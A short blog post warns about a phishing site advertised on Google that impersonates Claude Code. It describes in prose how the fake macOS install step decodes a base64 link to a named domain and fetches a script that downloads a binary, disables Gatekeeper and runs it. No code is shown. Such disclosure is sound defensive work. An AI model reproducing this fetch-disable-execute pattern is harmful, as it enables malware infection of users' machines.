Fake Claude Code Website: How I Found a Phishing Site in Google Ads
Phishing site impersonating Claude Code found in Google Ads: copied design, base64-encoded install script, malicious binary. How to spot the fake.
How I Found a Fake Claude Code Site
I wanted to google how to natively work with multiple agents for different roles out of the box in Claude Code without external crutches.
AND BOOM — A Claude Code AD. Suspicious site? 👁️🗨️ I clicked it.
How the Phishing Attack Works
The site is completely copied from the official Claude site. The only difference is the install script for macOS. There's a base64-encoded link to raytherrien.com, which returns a 1-line script that:
- Downloads a ~7MB binary for macOS
- Disables macOS security (Gatekeeper)
- Makes it executable and runs it
What it does after that — I didn't investigate further.
How to Protect Yourself from AI Tool Phishing
Be careful, especially when downloading programs from the internet or running prompts/skills without reading them.
Many people will fall victim because of the AI hype, just like they did during the crypto boom.
Original post in Telegram: @danokhlopkov
Dan Okhlopkov — AI agent practitioner. Building tools for TON Blockchain analysis and Telegram automation.